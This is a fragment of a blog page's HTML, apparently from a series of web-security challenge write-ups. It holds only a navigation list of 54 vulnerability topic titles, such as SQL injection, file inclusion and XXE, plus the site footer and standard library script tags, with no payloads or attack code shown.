class="nav-number">11.</span> <span class="nav-text">11.Install files</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#12-Improper-redirect"><span class="nav-number">12.</span> <span class="nav-text">12.Improper redirect</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#13-CRLF"><span class="nav-number">13.</span> <span class="nav-text">13.CRLF</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#14-File-upload-double-extensions"><span class="nav-number">14.</span> <span class="nav-text">14.File upload - double extensions</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#15-File-upload-MIME-type"><span class="nav-number">15.</span> <span class="nav-text">15.File upload - MIME type</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#16-HTTP-cookies"><span class="nav-number">16.</span> <span class="nav-text">16.HTTP cookies</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#17-Directory-traversal"><span class="nav-number">17.</span> <span class="nav-text">17.Directory traversal</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#18-File-upload-null-byte"><span class="nav-number">18.</span> <span class="nav-text">18.File upload - null byte</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#19-PHP-assert"><span class="nav-number">19.</span> <span class="nav-text">19.PHP assert()</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#20-PHP-filters"><span class="nav-number">20.</span> <span class="nav-text">20.PHP filters</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#21-PHP-register-globals"><span class="nav-number">21.</span> <span class="nav-text">21.PHP register globals</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#22-File-upload-ZIP"><span class="nav-number">22.</span> <span class="nav-text">22.File upload - ZIP</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#23-Command-injection-Filter-bypass"><span class="nav-number">23.</span> <span class="nav-text">23.Command injection - Filter bypass</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#24-Local-File-Inclusion"><span class="nav-number">24.</span> <span class="nav-text">24.Local File Inclusion</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#25-Local-File-Inclusion-Double-encoding"><span class="nav-number">25.</span> <span class="nav-text">25.Local File Inclusion - Double encoding</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#26-PHP-Loose-Comparison"><span class="nav-number">26.</span> <span class="nav-text">26.PHP - Loose Comparison</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#27-PHP-preg-replace"><span class="nav-number">27.</span> <span class="nav-text">27.PHP preg_replace()</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#28-PHP-type-juggling"><span class="nav-number">28.</span> <span class="nav-text">28.PHP type juggling</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#29-Remote-File-Inclusion"><span class="nav-number">29.</span> <span class="nav-text">29.Remote File Inclusion</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#30-Server-side-Template-Injection"><span class="nav-number">30.</span> <span class="nav-text">30.Server-side Template Injection</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#31-SQL-injection-authentication"><span class="nav-number">31.</span> <span class="nav-text">31.SQL injection - authentication</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#32-SQL-injection-authentication-GBK"><span class="nav-number">32.</span> <span class="nav-text">32.SQL injection - authentication - GBK</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#33-SQL-injection-string"><span class="nav-number">33.</span> <span class="nav-text">33.SQL injection - string</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#34-LDAP-injection-authentication"><span class="nav-number">34.</span> <span class="nav-text">34.LDAP injection - authentication</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#35-NoSQL-injection-authentication"><span class="nav-number">35.</span> <span class="nav-text">35.NoSQL injection - authentication</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#36-Path-Truncation"><span class="nav-number">36.</span> <span class="nav-text">36.Path Truncation</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#37-PHP-Serialization"><span class="nav-number">37.</span> <span class="nav-text">37.PHP Serialization</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#38-SQL-injection-numeric"><span class="nav-number">38.</span> <span class="nav-text">38.SQL injection - numeric</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#39-SQL-Injection-Routed"><span class="nav-number">39.</span> <span class="nav-text">39.SQL Injection - Routed</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#40-PHP-Eval"><span class="nav-number">40.</span> <span class="nav-text">40.PHP - Eval</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#41-XML-External-Entity"><span class="nav-number">41.</span> <span class="nav-text">41.XML External Entity</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#42-SQL-Truncation"><span class="nav-number">42.</span> <span class="nav-text">42.SQL Truncation</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#43-XPath-injection-authentication"><span class="nav-number">43.</span> <span class="nav-text">43.XPath injection - authentication</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#44-Local-File-Inclusion-Wrappers"><span class="nav-number">44.</span> <span class="nav-text">44.Local File Inclusion - Wrappers</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#45-SQL-injection-Error"><span class="nav-number">45.</span> <span class="nav-text">45.SQL injection - Error</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#46-SQL-injection-Insert"><span class="nav-number">46.</span> <span class="nav-text">46.SQL injection - Insert</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#47-XSLT-Code-execution"><span class="nav-number">47.</span> <span class="nav-text">47.XSLT - Code execution</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#48-Java-Spring-Boot"><span class="nav-number">48.</span> <span class="nav-text">48.Java - Spring Boot</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#49-SQL-injection-file-reading"><span class="nav-number">49.</span> <span class="nav-text">49.SQL injection - file reading</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#50-XPath-injection-string"><span class="nav-number">50.</span> <span class="nav-text">50.XPath injection - string</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#51-NoSQL-injection-blind"><span class="nav-number">51.</span> <span class="nav-text">51.NoSQL injection - blind</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#52-SQL-injection-Time-based"><span class="nav-number">52.</span> <span class="nav-text">52.SQL injection - Time based</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#53-SQL-injection-blind"><span class="nav-number">53.</span> <span class="nav-text">53.SQL injection - blind</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#54-XPath-injection-blind"><span class="nav-number">54.</span> <span class="nav-text">54.XPath injection - blind</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">LH</span>

  
</div>






        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
  

  

  

  


<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

  </body>
</html>
